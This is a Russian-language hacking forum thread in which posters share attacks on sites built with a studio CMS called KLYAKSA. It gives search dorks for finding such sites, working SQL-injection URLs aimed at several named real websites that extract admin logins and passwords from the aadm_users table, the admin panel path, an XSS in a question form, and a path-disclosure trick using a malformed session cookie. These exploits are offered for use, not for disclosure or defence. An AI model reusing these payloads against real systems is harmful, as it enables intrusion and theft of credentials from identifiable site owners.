Старый 13.01.2011, 23:45   #1
0x0
 
Аватар для 0x0
 
Регистрация: 09.01.2011
Сообщений: 11
Репутация: 4
По умолчанию "CMS" КЛЯКСА incorporated:)

Нашол вот такой "движок". Очень много уязвимых сайтов.
КОда нет , так как они делают сайты на заказ, cms просто не дают.

Dork:"Создание сайта: КЛЯКСА incorporated"
Dork:"Сделано в студии КЛЯКСА®"

Sql inj:
/a-form/index.php?formid=1 (на сайте formid должен = числовым идентификатором)
/a-price/group.php?groupid=37 (встречается реже)

Example:
_http://www.fesko.com.ua/a-news/news.php?id=-2+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7,8,9,10+from+aadm_users--

_http://www.kyivflorist.com/a-price/group.php?groupid=-4+union+select+1,version(),3,4,5,6+--

таблица админа - aadm_users
колонки логина пасса - login, password
админка - site.com/aadm/

З.Ы На некоторых сайтах дыры не пашут, наверное уже вручную залатали.
__________________
Подписи с "конями" противоречат правилам форума:
https://rdot.org/forum/showthread.php?t=1174
//выпилено Jokester.
0x0 вне форума   Ответить с цитированием
Старый 14.01.2011, 18:59   #2
rsaReliableS
 
Регистрация: 29.07.2010
Сообщений: 36
Репутация: 7
По умолчанию

XSS
/a-quest/quest.php
поля: name, question
email - экранизируется

Раскрытие путей
в cookies:
PHPSESSID=[]#@#--!!4d1546d3556115621befd501096a0bae
дает:
Код:
Warning: session_start() [function.session-start]: The session id contains invalid characters, valid characters are only a-z, A-Z and 0-9 in /home/salvador/public_html/aadm/include/com.php on line 10
rsaReliableS вне форума   Ответить с цитированием
Старый 14.01.2011, 21:06   #3
~d0s~
 
Регистрация: 03.08.2010
Сообщений: 45
Репутация: 26
По умолчанию

Ну раз уж пошла такая пъянка,то...

/a-quest/quest.php
Sqli:
Код:
http://localhost/a-quest/quest.php?id=-1+union+select+1,2,user(),4,5,6-- 1
Пример (вроде не запрещено выкладывать?):
Код:
http://www.natalie-magan.com/a-quest/quest.php?id=-1+union+select+1,2,user(),4,5,6-- 1
http://oris.if.ua/a-quest/quest.php?id=-1+union+select+1,2,user(),4,5,6-- 1
скрипт принимает пост
~d0s~ вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot